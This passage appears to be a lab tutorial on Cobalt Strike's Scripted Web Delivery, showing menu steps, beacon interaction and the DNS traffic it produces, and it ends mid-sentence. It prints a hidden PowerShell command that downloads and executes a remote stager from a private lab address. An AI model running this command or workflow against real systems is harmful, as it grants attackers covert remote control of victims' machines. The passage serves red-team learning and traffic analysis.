|You are here|
From the menu, go to
Attacks > Web Drive-by > Scripted Web delivery (S). The following window pops up:
Clicking on the Launch button will open a second popup window with the payload to copy.
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://172.16.222.130:80/a'))"
Once the payload is executed, a session appears in Cobalt Strike:
Besides the anti-virus, here is what the network traffic looks like:
Request for action
Once executed, the session will probably end up as an empty line. Right click on it and select
Interact. Enter commands (e.g.
sleep 5) to force a feedback from the target.
Pay attention to the 2 highlighted blocks below:
- the first block is the DNS traffic with actions (there is data)
- the second block is the DNS traffic without action (pending for action, with a return of